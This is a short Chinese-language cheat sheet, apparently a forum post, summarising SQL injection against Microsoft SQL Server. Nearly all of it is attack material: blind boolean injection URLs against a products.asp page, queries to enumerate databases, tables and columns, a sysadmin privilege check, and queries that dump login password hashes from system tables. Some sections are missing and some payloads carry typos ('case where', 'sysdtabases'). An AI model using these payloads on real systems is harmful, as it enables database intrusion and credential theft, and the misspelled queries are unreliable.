MsSQL数据库,注入总结

一.mssql系统自带函数变量
@@version
@@servername
@@language
@@spid
@@rowcount
@@pack_received
system_user
db_name()
user()

///////////////////////////////////////////////////////////
三.权限查询
is_srvrolemember('sysadmin')=1

//////////////////////////////////////////////////

/////////////////////////////////////////////////////

六.暴力猜解
len()函数用于猜解长度
ascii(substring()) 用于猜解字符
例
products.asp?id=12/(case when (len(system_user)>16) then 1 else 0 end)
products.asp?id=12/(case where (ascii(substring((select system_user),1,1))>64) then 1 else 0 end)

七.查询语句
1.查询数据库
select name from master..sysdtabases
2.查询数据库表名
select name from 数据库名..sysobjects where xtype='U'
3.查询表字段
select name from 数据库名..syscolumns where id=(select id from 数据库名..sysobjects where name='表名')
4.口令
select name,password from master.dbo.sysxlogins
SQL Server 2005 :
select password_hash from sys.sql_logins
5.查询表的列名
select top 1 col_name(object_id('table'),1) from sysobjects

欢迎补充